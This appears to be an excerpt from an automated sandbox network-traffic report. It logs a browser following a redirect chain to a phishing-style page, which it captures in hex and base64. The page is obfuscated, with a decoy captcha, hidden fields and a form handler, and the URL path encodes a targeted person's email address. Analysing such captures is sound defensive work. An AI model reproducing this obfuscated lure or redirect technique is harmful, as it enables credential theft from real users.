                                                                                                                                                                                                                                                                                      2024-10-24 22:06:30 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      35192.168.2.1649767142.250.186.1314436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC1273OUTGET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.co.uk
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC691INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Location: https://www.google.co.uk/amp/we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-dQg2cEK8rdO4LvdNSzt0MA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:33 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      Content-Length: 316
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC316INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 61 6d 70 2f 77 65 34 75 70 72 6f 64 75 63 74 73 2e 63 6f 6d 2f 63 62 62 2f 6c 6c 64 2f 6a 6a 67 2f 51 6d 52 77 34 35 6b 49 6b 61 64 4d 4a 33 41 6b 54 31 68 49 64 4d 76 53 2f 61 6d 39 79
                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.uk/amp/we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9y


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      36192.168.2.1649766142.250.186.1314436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC1119OUTGET /amp/we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.co.uk
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC866INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Location: http://we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vNZhpi2eqfiRvekdzmaUMA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:33 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      Content-Length: 294
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:33 UTC294INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 65 34 75 70 72 6f 64 75 63 74 73 2e 63 6f 6d 2f 63 62 62 2f 6c 6c 64 2f 6a 6a 67 2f 51 6d 52 77 34 35 6b 49 6b 61 64 4d 4a 33 41 6b 54 31 68 49 64 4d 76 53 2f 61 6d 39 79 5a 47 46 75 4c 6d 4a 73 59 57 4e 72 51 47 78 6c 59 58 4a 6d 61 57
                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaW


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      37192.168.2.1649775188.114.96.34436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:35 UTC1410OUTGET /6ysw/ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      Referer: http://we4uproducts.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6InJhYXArdXlCalZsZlhTd1N4eTNUOFE9PSIsInZhbHVlIjoicnlzNFNWN2RKRks0cHAvcHg0aVBBK2ZncnZBdzBKU09yeG5SVm0rZFc5ejJ0eVdBbEFjdFpjUWZXNCtVOWFOZ2ZURVB6OFlhdUVEcW5tdkhlUFVub2ptWDloYXM0ZGlVOVhOUFVUTWZSY1FublBMZndIK0NNdnNWMGZEQ2ZoQTMiLCJtYWMiOiI2ZWY3NjJlZWI3OTA2ZWViMGMyNTRjODE3MDIzOTYyNzQzMzgyNmEzMjcxY2ZhOTA5NTljNDEyNjY4ZDgxM2QyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkMyREpkMFVPTWR1aEI3bUZSMnc0NXc9PSIsInZhbHVlIjoiN215UFpuYzhHc05KZ1FZTWNKMU5YN1dNL2tWb1dXcmNaalJKckpDcys2MU53SVZiZmVRengwQmNGaVVYWmc5bWErQUpkT3QwVjlaMkVpNUxHbW1BYnR0dHpjTVlCWUdEcC9nVjA5UCtCSWVoTUZSNGUxdnJ5LzRzT0g1RG5vaksiLCJtYWMiOiJmYmFlMTk0NTg2MmE2Zjg5YjA0Yzk5MDM5M2JhNDJmNmFkZTY2ZGJkN2E4ZDQxMDdjM2M2YjhiYjlkMGZjM2JlIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:40 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CmRy4QbUNn6GIkSZti6sTZl0mNHQJBt4SXFvxOL6fopTY00AqXF2CuPUO%2B2HuM%2BbYBjzHuUAh2lY3DCDwasDs0TShNgGKOYEJuoOYwYs4GUmmUl4A76i8PBZA3Ypjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=39076&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2320&delivery_rate=75946&cwnd=251&unsent_bytes=0&cid=5c1d8e8487b5be6a&ts=4326&x=0"
                                                                                                                                                                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6Im5yckRvYm5NNE40MVFUS1F5bkdVekE9PSIsInZhbHVlIjoiRG9wL3dqV0lGQ1JCL2p0MG93QWh3ZkEzT1JaTHJ5MW13eTNaa2l1eVpkOG53anRpdDhsSWU0M0RlTHE3K2pXOUs3SCtkam1vVDlHUDd3ZmNoaUZQTE5QQ1IxSlhCc2VlSUVKa3MvVWJhZWg4TzJPeGlxVWp3SlVJTmlnR2IxN0kiLCJtYWMiOiI2NmFmMGJhNGI5ZDUzZDczZjNmNmZmYzFmZTBlMDc5ZDgyZjhjNjdlM2QyNTlhYjM1ZTIyM2FiNDk0NTAwNTQxIiwidGFnIjoiIn0%3D; expires=Fri, 25-Oct-2024 00:06:40 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC708INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 68 35 59 32 74 36 61 46 51 7a 65 6e 70 32 53 31 4d 33 54 47 51 32 4d 6d 5a 49 4b 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 33 64 50 62 30 6f 33 63 6a 56 61 56 6a 68 51 4f 55 4a 61 63 55 46 5a 52 6d 73 78 51 7a 4e 31 62 30 70 6c 5a 33 42 53 59 7a 46 57 63 7a 49 76 61 55 6b 78 52 57 64 79 52 6a 42 70 61 47 6f 32 59 7a 68 51 55 6e 5a 4f 51 30 5a 51 55 7a 5a 45 54 43 74 4a 63 31 4e 6b 65 6d 67 31 5a 54 42 51 4d 31 68 45 59 6c 46 73 65 56 64 6d 59 30 35 56 62 54 56 59 55 33 70 45 55 54 68 69 64 54 4d 31 59 55 30 32 4f 55 70 61 5a 46 6c 68 65 6a 45 33 53 6d 56 42 61 44 51 78 55 54 5a 6d 52 6b 31 42 54 6d 4a 57 4f 48 64 30 54 44 41
                                                                                                                                                                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ikh5Y2t6aFQzenp2S1M3TGQ2MmZIK0E9PSIsInZhbHVlIjoiY3dPb0o3cjVaVjhQOUJacUFZRmsxQzN1b0plZ3BSYzFWczIvaUkxRWdyRjBpaGo2YzhQUnZOQ0ZQUzZETCtJc1Nkemg1ZTBQM1hEYlFseVdmY05VbTVYU3pEUThidTM1YU02OUpaZFlhejE3SmVBaDQxUTZmRk1BTmJWOHd0TDA
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 34 62 33 35 0d 0a 3c 21 2d 2d 20 54 68 65 20 62 69 67 67 65 73 74 20 72 69 73 6b 20 69 73 20 6e 6f 74 20 74 61 6b 69 6e 67 20 61 6e 79 20 72 69 73 6b 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 69 6e 20 77 68 61 74 20 79 6f 75 20 68 61 76 65 2c 20 62 75 74 20 77 68 6f 20 79 6f 75 20 61 72 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 47 61 32 31 45 4c 6d 78 70 62 32 35 70 62 6d 74 6c 65 53 35 6a 62 32 30 76 4e 6e 6c 7a 64 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46
                                                                                                                                                                                                                                                                                      Data Ascii: 4b35... The biggest risk is not taking any risk. --><script>/* Success is not in what you have, but who you are. */if(atob("aHR0cHM6Ly9Ga21ELmxpb25pbmtleS5jb20vNnlzdy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBF
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 70 36 53 30 78 31 52 33 5a 36 59 31 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 6a 46 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61
                                                                                                                                                                                                                                                                                      Data Ascii: ttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1p6S0x1R3Z6Y1ouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMjFweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlna
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 6b 49 48 52 6f 59 58 51 67 64 47 68 6c 49 47 68 68 63 6d 52 6c 63 69 42 4a 49 48 64 76 63 6d 73 73 49 48 52 6f 5a 53 42 74 62 33 4a 6c 49 47 78 31 59 32 73 67 53 53 42 7a 5a 57 56 74 49 48 52 76 49 47 68 68 64 6d 55 75 49 43 30 74 50 67 6f 38 4c 32 68 6c 59 57 51 2b 44 51 6f 4e 43 6a 78 69 62 32 52 35 49 48 4e 30 65 57 78 6c 50 53 4a 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57
                                                                                                                                                                                                                                                                                      Data Ascii: kIHRoYXQgdGhlIGhhcmRlciBJIHdvcmssIHRoZSBtb3JlIGx1Y2sgSSBzZWVtIHRvIGhhdmUuIC0tPgo8L2hlYWQ+DQoNCjxib2R5IHN0eWxlPSJmb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLW
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 52 76 63 43 42 6a 61 47 46 7a 61 57 35 6e 49 48 52 6f 5a 53 42 74 62 32 35 6c 65 53 42 68 62 6d 51 67 63 33 52 68 63 6e 51 67 59 32 68 68 63 32 6c 75 5a 79 42 30 61 47 55 67 63 47 46 7a 63 32 6c 76 62 69 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 45
                                                                                                                                                                                                                                                                                      Data Ascii: ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iVW5rbm93biI+DQo8IS0tIDxkaXY+U3RvcCBjaGFzaW5nIHRoZSBtb25leSBhbmQgc3RhcnQgY2hhc2luZyB0aGUgcGFzc2lvbi48L2Rpdj4gLS0+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPCE
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 6b 35 56 5a 53 67 70 49 48 73 4e 43 69 41 67 49 43 42 32 59 58 49 67 61 32 46 36 53 6b 56 33 56 45 68 61 59 53 41 39 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64 45 56 73 5a 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 4a 71 61 47 64 53 62 6c 4e 58 56 32 52 69 49 69 6b 37 44 51 6f 67 49 43 41 67 61 32 46 36 53 6b 56 33 56 45 68 61 59 53 35 76 62 6e 4e 31 59 6d 31 70 64 43 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 49 43 68 6c 64 6d 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 48 30 37 44 51 6f 67 49 43 41 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 32 56 30 52 57 78 6c 62 57 56 75 64 45 4a 35 53 57 51 6f 49 6e 42 68 5a 32 56 73
                                                                                                                                                                                                                                                                                      Data Ascii: k5VZSgpIHsNCiAgICB2YXIga2F6SkV3VEhaYSA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJqaGdSblNXV2RiIik7DQogICAga2F6SkV3VEhaYS5vbnN1Ym1pdCA9IGZ1bmN0aW9uIChldmVudCkgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIH07DQogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInBhZ2Vs
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 4e 76 63 79 35 6a 62 32 30 6e 4b 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 66 53 6b 4e 43 69 41 67 49 43 41 75 59 32 46 30 59 32 67 6f 5a 58 4a 79 62 33 49 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 68 63 32 39 7a 4c 6d 4e 76 62 53 63 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4f 77 30 4b 66 51 30 4b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 38 49 53 30 74 49 45 6b 67 5a 6d 6c 75 5a 43 42 30 61 47 46 30 49 48 52 6f 5a 53 42 6f 59 58 4a 6b 5a 58 49 67 53 53 42 33 62 33 4a 72 4c 43 42 30 61 47 55 67 62 57 39 79 5a 53 42 73 64 57 4e 72 49 45 6b 67 63 32 56 6c 62 53 42 30 62 79 42 6f 59 58 5a 6c 4c
